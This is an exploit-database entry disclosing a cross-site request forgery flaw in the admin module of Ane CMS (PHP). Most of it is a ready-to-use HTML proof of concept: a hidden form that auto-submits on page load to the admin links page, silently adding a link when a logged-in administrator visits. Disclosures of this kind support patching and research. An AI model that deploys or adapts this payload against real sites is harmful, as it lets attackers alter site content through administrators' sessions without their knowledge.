Ane CMS CSRF Vulnerability

2010-03-11T00:00:00
ID 1337DAY-ID-11264
Type zdt
Reporter Pratul Agrawal
Modified 2010-03-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================
Ane CMS CSRF Vulnerability
==========================

# Vulnerability found in- Admin module
  
# Credit by     Pratul Agrawal
 
# Software      Ane_CMS
 
# Category      CMS / Portals
 
# Plateform     php
 
  
  
#  Proof of concept   #
 
Targeted URL:  http://server/acp/index.php?p=cfg&m=links
 
 
 Script to Add a new link through Cross Site request forgery
  
           .  ................................................................................................................
  
                      <html>
 
                        <body>
 
                           <form name="XYZ" action="http://server/acp/index.php?p=cfg&m=links&id=0" method="post">
 
                                  <input type=hidden name="name" value="master">
 
                                  <input type=hidden name="link" value="master.asp">
 
                                  <input type=hidden name="type" value="1">
             
                                  <input type=hidden name="view" value="0">
 
                           </form>
 
                             <script>
 
                               document.XYZ.submit();
 
                             </script>
 
                        </body>
 
                      </html>
  
           .  ..................................................................................................................
  
  
  
After execution refresh the page and u can see that a new link with teh given name is Added automatically.



#  0day.today [2018-01-03]  #